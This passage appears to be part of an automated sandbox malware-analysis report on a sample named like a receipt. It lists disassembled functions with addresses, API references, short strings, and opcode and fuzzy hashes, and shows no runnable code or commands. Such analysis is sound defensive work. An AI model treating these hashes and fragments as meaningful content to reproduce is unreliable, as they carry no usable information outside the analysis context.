                                                                  • Opcode Fuzzy Hash: 0179e7564770832d7b7a4f4670a4ba5ee57020c6808e1c58eb963a88254eadba
                                                                  • Instruction Fuzzy Hash: F811F2B58003499FDB10DF9AD989BEEFBF8FB48320F10845AE558A7200D375A944CFA1
                                                                  Function 00A2B500 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00A2B566
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 4e6c23c7323d9d79c72f6ea6dc2b601183baac8b35b5e6b06c0bb32a519dbfb8
                                                                  • Instruction ID: e8e68340b3f58758b9b6d07d9c2fe86f6a67d940f867e5c570a801fa9902360e
                                                                  • Opcode Fuzzy Hash: 4e6c23c7323d9d79c72f6ea6dc2b601183baac8b35b5e6b06c0bb32a519dbfb8
                                                                  • Instruction Fuzzy Hash: B811DFB5C003598FDB10DF9AD544ADEFBF4AF88320F10856AD819A7210C379A545CFA1
                                                                  Function 072E2D98 Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (hq
                                                                  • API String ID: 0-4060669308
                                                                  • Opcode ID: a01c2dd077b009b63ae351207e5d74efdd2887b580b08d5bef79943f815a0a66
                                                                  • Instruction ID: 36d2166962a72586e37b4c45094de5cc16e7a28cd3551c6b0ceac8498912ab40
                                                                  • Opcode Fuzzy Hash: a01c2dd077b009b63ae351207e5d74efdd2887b580b08d5bef79943f815a0a66
                                                                  • Instruction Fuzzy Hash: EF71F4B0610716DFDB24DB29D854BAEBBEAFFC8311F548829E50A97290CF749D41CB90
                                                                  Function 072E778F Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %*&/)(#$^@!~-_
                                                                  • API String ID: 0-3325533558
                                                                  • Opcode ID: 3d897dbccf5b3c8d2208236c971363e9e683910d47bd5616bfac18b35410779f
                                                                  • Instruction ID: cb3e03706e7a0960c6cd756ed1923ffe609b0d37b614a90397d63b6464162f1d
                                                                  • Opcode Fuzzy Hash: 3d897dbccf5b3c8d2208236c971363e9e683910d47bd5616bfac18b35410779f
                                                                  • Instruction Fuzzy Hash: 1D711270B042449FD700ABB4E459BAEBBB2FF89300F0489E9D8899F396CB746D45C791
                                                                  Function 072E77C8 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %*&/)(#$^@!~-_
                                                                  • API String ID: 0-3325533558
                                                                  • Opcode ID: 7eee0111cb8ea711d87867b5eab386f2379afe0ada353d939c5ce672ab8c3256
                                                                  • Instruction ID: 2160f0561b8e7f140180c896e237af5c01e9c89c15cf20efea5f29818de80c67
                                                                  • Opcode Fuzzy Hash: 7eee0111cb8ea711d87867b5eab386f2379afe0ada353d939c5ce672ab8c3256
                                                                  • Instruction Fuzzy Hash: 5761AF74B002159FD700AFA4E459BAEB7A2FF88300F1489A9D8859F39ACF746D46C781
                                                                  Function 072EEDE8 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Tedq
                                                                  • API String ID: 0-228892971
                                                                  • Opcode ID: ab9842f8d4210e0ee20752cd4759f81b40af32e9f673f14101a5f9909a86cebf
                                                                  • Instruction ID: 22d5edff3c47a401978098a190633d5ea3685cbae8e6a90219d843dc9d003dea
                                                                  • Opcode Fuzzy Hash: ab9842f8d4210e0ee20752cd4759f81b40af32e9f673f14101a5f9909a86cebf
                                                                  • Instruction Fuzzy Hash: 1B31F9B4E142488FEB08DFEAD9446EEBBFABF89310F54C029D419AB354DB705845CB50
                                                                  Function 072E8E68 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq
                                                                  • API String ID: 0-847773763
                                                                  • Opcode ID: 6bd249edf7dc6ebc9430121ee8d4a5908cbbb43731dc44a9c43ef762f904fa75
                                                                  • Instruction ID: 7980ba0583f6a89217188fe6ddad1ccb3fc620722b022cf46feafa4e09595bdb
                                                                  • Opcode Fuzzy Hash: 6bd249edf7dc6ebc9430121ee8d4a5908cbbb43731dc44a9c43ef762f904fa75
                                                                  • Instruction Fuzzy Hash: 33110AB093C2C0DFC32196A494106B57BED5B03104FDCA4EBF5C5CA156C6BA8441C3A7
                                                                  Function 072E7D58 Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: W
                                                                  • API String ID: 0-655174618
                                                                  • Opcode ID: d2cb55d581f2d20b08ac1eb3da7c2caeabaabb4d2cfc11e82f55325d5c665fea
                                                                  • Instruction ID: e9d178034e37792e74fbfc77bc38adf59f40dbde3592a1009cdf2e7f4ffb3d5a
                                                                  • Opcode Fuzzy Hash: d2cb55d581f2d20b08ac1eb3da7c2caeabaabb4d2cfc11e82f55325d5c665fea
                                                                  • Instruction Fuzzy Hash: F201F57096C385CFC7029674C4146B97FB69F47309F4480AAD4454F786C77A9886D761
                                                                  Function 072E82CE Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq
                                                                  • API String ID: 0-847773763
                                                                  • Opcode ID: cfba8200169f242731c95c1fd9c774de9ee1d8fabe9874dfd6160893814e0e72
                                                                  • Instruction ID: 46f1a566b45a8b7804c7fa30f6ea2cb895511ea98d88e8c19fe247d273c46abf
                                                                  • Opcode Fuzzy Hash: cfba8200169f242731c95c1fd9c774de9ee1d8fabe9874dfd6160893814e0e72
                                                                  • Instruction Fuzzy Hash: 7EF0BEF0A35542CFD320DA44D500721B3AEB746348FC4A3A6949ADB151C7B0C881C799
                                                                  Function 072E6D20 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: G
                                                                  • API String ID: 0-985283518
                                                                  • Opcode ID: 56c3d86b8309a5106f26d07d31aad4785fd973bcf13148aa4764ac90d971dd57
                                                                  • Instruction ID: bb5a05be0983476390d9e70c5259f5a68e951d9c49b0f2cf71ab15417df2ffba
                                                                  • Opcode Fuzzy Hash: 56c3d86b8309a5106f26d07d31aad4785fd973bcf13148aa4764ac90d971dd57
                                                                  • Instruction Fuzzy Hash: 1ED05EB117D6449FC7059FA0ED151E9BBB9C713229F4824D6D4098A582CAA80F11EB92
                                                                  Function 072E6D30 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: G
                                                                  • API String ID: 0-985283518
                                                                  • Opcode ID: 465a90715eb9de70c476c28a95effd905ced7784683087b12657eed4da801b74
                                                                  • Instruction ID: 6e01672a552c405117241c80a788bfe50b245bea8b740337974bb21d06b4c00b
                                                                  • Opcode Fuzzy Hash: 465a90715eb9de70c476c28a95effd905ced7784683087b12657eed4da801b74
                                                                  • Instruction Fuzzy Hash: D3C012B0428108EBC708DE84E90966DB7AD9742200F900088D90E42600CFB11E20AAA2
                                                                  Function 072E3478 Relevance: .5, Instructions: 459COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2696a91c0f1202ce1878318abf5ac7a39e56a06670f7b76b1d0087eef37a7de4
                                                                  • Instruction ID: 420bee515e56b71df9c223d5126e777d6c02e2318a74541ed7fdccf4198b6d5d
                                                                  • Opcode Fuzzy Hash: 2696a91c0f1202ce1878318abf5ac7a39e56a06670f7b76b1d0087eef37a7de4
                                                                  • Instruction Fuzzy Hash: 0AD1E2F0F20106DFCB15EB68C4486AEBFBAEF45201F9544B9D446A72A6DB31CC61CB91
                                                                  Function 072E0480 Relevance: .3, Instructions: 332COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1340060e24b4a85a9b19d3d03cc8e0a5178cb5b01ca4c23a1ace42ee834e760f
                                                                  • Instruction ID: 88c71f8a8d95ec22f38254f4335118f0b03ab82183cc5c8383765dd6b737817c
                                                                  • Opcode Fuzzy Hash: 1340060e24b4a85a9b19d3d03cc8e0a5178cb5b01ca4c23a1ace42ee834e760f
                                                                  • Instruction Fuzzy Hash: F6F1C571D1061ACBCF14DFA8C854AEDB7B5BF88300F1086AAD559B7254EB70AA85CF90
                                                                  Function 072E0471 Relevance: .3, Instructions: 308COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c47abe0da6a0bdfa2e6434c69cdcc0192d7176f888c850c2deb652690c55a1dd
                                                                  • Instruction ID: 02c9440e781f737547a2849ed4f799065a14097c32475cceb3b4ed77729761f3
                                                                  • Opcode Fuzzy Hash: c47abe0da6a0bdfa2e6434c69cdcc0192d7176f888c850c2deb652690c55a1dd
                                                                  • Instruction Fuzzy Hash: E7E1D771D1061ACBCF10DFA8C8546EDB7B5FF88300F1186AAD559B7254EB70AA85CF90
                                                                  Function 072E4AA1 Relevance: .2, Instructions: 233COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d4c58477df635d886e12b85a8f3f02caaf5a28ac5807a507e5d18f5635ac73a4
                                                                  • Instruction ID: b5bdea4d7492eba15e6074b3777b6fb66f69875f6a1a51ce42a02e853dbf212d
                                                                  • Opcode Fuzzy Hash: d4c58477df635d886e12b85a8f3f02caaf5a28ac5807a507e5d18f5635ac73a4
                                                                  • Instruction Fuzzy Hash: 66B1F975910619CFCB10EF68C840AD8FBB5FF49314F05C299E549BB215EB70AA89CF90
                                                                  Function 072E0C38 Relevance: .1, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 046c37a1d9f52eab1fe05286809a75aeadd41a2073e5240b803d34117a6d416a
                                                                  • Instruction ID: a513d316657f8e87c623618e837749b27158c658d244e3c5accb773d376eb5cc
                                                                  • Opcode Fuzzy Hash: 046c37a1d9f52eab1fe05286809a75aeadd41a2073e5240b803d34117a6d416a
                                                                  • Instruction Fuzzy Hash: 52512D74A1060A8FCF10DFA8C8849ADF7B5FF89310F509669D456B7314EB70E985CB50
                                                                  Function 072E1800 Relevance: .1, Instructions: 132COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 61d43d134d3b7bccc52216bdc0cebe58b33a7a5afb3bea92a648ec95a82fdf42
                                                                  • Instruction ID: 297d1043ab7f7368a1b94051f09942e2cc22a42b219c1495428bcfc424c21275
                                                                  • Opcode Fuzzy Hash: 61d43d134d3b7bccc52216bdc0cebe58b33a7a5afb3bea92a648ec95a82fdf42
                                                                  • Instruction Fuzzy Hash: C74160B0A2120ADFEB15DF68E454A6EB7FAFF89301F144079D80697290DE30D951CB51
                                                                  Function 072E0E40 Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b3e6e7bd8729a0fccb977466d9f30ccf41bb074a67cde1131bb9a359b86db298
                                                                  • Instruction ID: b03c033ecf4603f54c3ceccc25c113214f41fbc0325b69eadde6feea2c2f4b0a
                                                                  • Opcode Fuzzy Hash: b3e6e7bd8729a0fccb977466d9f30ccf41bb074a67cde1131bb9a359b86db298
                                                                  • Instruction Fuzzy Hash: B9519335E10619CFCB00EFA8D4849EDF7B5FF89300F50856AE506AB321EB71A959CB91
                                                                  Function 072E0C2B Relevance: .1, Instructions: 125COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6ce6c55e06bb88fb447c7eb760054fe7e7e172af9841528e8787dbe14436c41a
                                                                  • Instruction ID: bbba8f63b174b617f10466b9f3f84669181564d3d64412751032ae5d18389b83
                                                                  • Opcode Fuzzy Hash: 6ce6c55e06bb88fb447c7eb760054fe7e7e172af9841528e8787dbe14436c41a
                                                                  • Instruction Fuzzy Hash: 5B416E70A1060A8FCF10DFA4C8845ADFBB5FF89310B548669D456A7315EB74E985CB90
                                                                  Function 072E9DFB Relevance: .1, Instructions: 124COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b42d978c5951db274bf4a9f99977f0c9b9658c2c27de92c3918921e2d66d24d0
                                                                  • Instruction ID: 16c64ba4d2f0b22408e09484d4fc6e689657252bea520396bffc09259503f7b1
                                                                  • Opcode Fuzzy Hash: b42d978c5951db274bf4a9f99977f0c9b9658c2c27de92c3918921e2d66d24d0
                                                                  • Instruction Fuzzy Hash: 5141D6B0B3420ACFDB118FA8C891BBEB7B9EF45300F90C427E1569B240C7B59985CB52
                                                                  Function 072E7A46 Relevance: .1, Instructions: 112COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd872e1ba27bf6c3dd396914a9d8b3070ae25d119816e2386ddeabcdc3735f86
                                                                  • Instruction ID: 45d96097dc8f8a8ac07331188ded2ade81c37a03f81d0fafb63e6824fc7c6f37
                                                                  • Opcode Fuzzy Hash: dd872e1ba27bf6c3dd396914a9d8b3070ae25d119816e2386ddeabcdc3735f86
                                                                  • Instruction Fuzzy Hash: A941D9B063D3958FC7056B74982816E7FBAAB86311F6444ABD583CB382CE744D42C772
                                                                  Function 072EC15B Relevance: .1, Instructions: 101COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb570b4e02e3b7a37443d41d809ecbdab5be816c56e5fa9752c05f57680e246f
                                                                  • Instruction ID: 05fbe994fdab0f8ba8f922b64198e34b8c0c2fa0ddd091d88f1b8a008b585ca7
                                                                  • Opcode Fuzzy Hash: eb570b4e02e3b7a37443d41d809ecbdab5be816c56e5fa9752c05f57680e246f
                                                                  • Instruction Fuzzy Hash: E731DFF0A3C256CBCB108AEC885027EB7BDBB47210F948177E416CE285C6B1D9D187B2
                                                                  Function 072E1198 Relevance: .1, Instructions: 100COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 57044eaaaca9bb24139fd1c1422d83f7e4aeda6be5b1a103b4eaf737ceff72e3
                                                                  • Instruction ID: 90e634a4f4669c7cbe436bcc4c65847dcf7ba575476ccffcc31f93f36fa7d9c1
                                                                  • Opcode Fuzzy Hash: 57044eaaaca9bb24139fd1c1422d83f7e4aeda6be5b1a103b4eaf737ceff72e3
                                                                  • Instruction Fuzzy Hash: 7D3191B1A20229DFDB14DFA8D84499DBBF6FF89301F10816AE905AB360DF709C51CB91
                                                                  Function 072E6B44 Relevance: .1, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 51cb81a24c816fed22d55a7e536ac48afb5907c23ad69a11756cf81667c50b57
                                                                  • Instruction ID: 0ab68d86aedcd058424d7750c486d0b48f4f31e9cecd602dfe5c71397b0c0442
                                                                  • Opcode Fuzzy Hash: 51cb81a24c816fed22d55a7e536ac48afb5907c23ad69a11756cf81667c50b57
                                                                  • Instruction Fuzzy Hash: CF3104B0634108CFD700DF98D4557AA77FAEBAA314F94D45AC016AB391CB75ED828BA0
                                                                  Function 072EA2E0 Relevance: .1, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e0426ba8b69e4750e584aab463fd4a6877241e6026490c771bddcbf277f22b71
                                                                  • Instruction ID: a6db58484bbc987bc91e9ff5d9503ff4d165fae384b2eeb3ac2e9a18243ea9b1
                                                                  • Opcode Fuzzy Hash: e0426ba8b69e4750e584aab463fd4a6877241e6026490c771bddcbf277f22b71
                                                                  • Instruction Fuzzy Hash: 5B3178B1A102499FCF14DFA9D844ADEBFF9EF48310F50802AE809A7310D734A944CFA0
                                                                  Function 072E2D88 Relevance: .1, Instructions: 94COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 73d2002787d97a74d8d4b2dea97baffd45a6e53e90d6a9fb239a4025576abba7
                                                                  • Instruction ID: 234926306334c7641b2efcac115f3175e8be0dc8abd61e55e52f4b65e634d591
                                                                  • Opcode Fuzzy Hash: 73d2002787d97a74d8d4b2dea97baffd45a6e53e90d6a9fb239a4025576abba7
                                                                  • Instruction Fuzzy Hash: BB31B1B0A21615EFCB14DF64C844BAEBBFAFF88300F548529E516A7290DB75ED40CB90
                                                                  Function 072E17DF Relevance: .1, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 337d994d9aa0b5c275c62d3150e0ea34d262fab0ed5f26ce83935aaf3e5cafdc
                                                                  • Instruction ID: 8985a46667df5e372bc2487c88e9a86de91a22f3c1be003823787466d44c9167
                                                                  • Opcode Fuzzy Hash: 337d994d9aa0b5c275c62d3150e0ea34d262fab0ed5f26ce83935aaf3e5cafdc
                                                                  • Instruction Fuzzy Hash: 1431C2B4A2130ADFEB25DF64D518BAA7BBAAF89300F144079D406D7291CB74CD51CB52
                                                                  Function 072EC308 Relevance: .1, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f171dbd84d074070ee5ebe35fc554c6be11d9ba5f6a3aef1b8dddb7dfbe129a2
                                                                  • Instruction ID: 586687b9384312d0db28de571052ae722ce71490e137ef5dbb1828cb5a03bd91
                                                                  • Opcode Fuzzy Hash: f171dbd84d074070ee5ebe35fc554c6be11d9ba5f6a3aef1b8dddb7dfbe129a2
                                                                  • Instruction Fuzzy Hash: 8D21D8F0734205DBC7249AD994116BA77AFBBC6750FA58026E8174B695CAB08CC28377
                                                                  Function 072E22F0 Relevance: .1, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2b519bb0b297b4f41a6575f1eb7bbc68f4b89c47cb721be74d0d02011863fad1
                                                                  • Instruction ID: 3caefee5b371f37b0db05426201b74929f3e7d7ab9a2220549c74b983294a6d2
                                                                  • Opcode Fuzzy Hash: 2b519bb0b297b4f41a6575f1eb7bbc68f4b89c47cb721be74d0d02011863fad1
                                                                  • Instruction Fuzzy Hash: 8031ADB5710202CFDB14DF69D880B6A73EEFB89311F548869E90ACB355DB30AC458B60
                                                                  Function 072E6568 Relevance: .1, Instructions: 84COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 66631f7f7a87df78476f11b14bf1c8c61d880bdf93ccc16422c86c7b8e0f4ca5
                                                                  • Instruction ID: 62a4506d7cf335680fbc8a77b6ff09da75c468d9c0ae1cb364bbe0a7dffa8376
                                                                  • Opcode Fuzzy Hash: 66631f7f7a87df78476f11b14bf1c8c61d880bdf93ccc16422c86c7b8e0f4ca5
                                                                  • Instruction Fuzzy Hash: 473118B4E2020E9FCF50DFE8D4505EEBBF5EB58310F504429D515E7250EB349A448BA0
                                                                  Function 072E0FC0 Relevance: .1, Instructions: 81COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3d6e5a076b362d800e4f73e67a0f1cbf50e6686058fc3804217de19ba5c9c7df
                                                                  • Instruction ID: be80ff1fd1c2e65643e2ce54568f9e8daed1d5d0f2cf2e05927110ea4289de7d
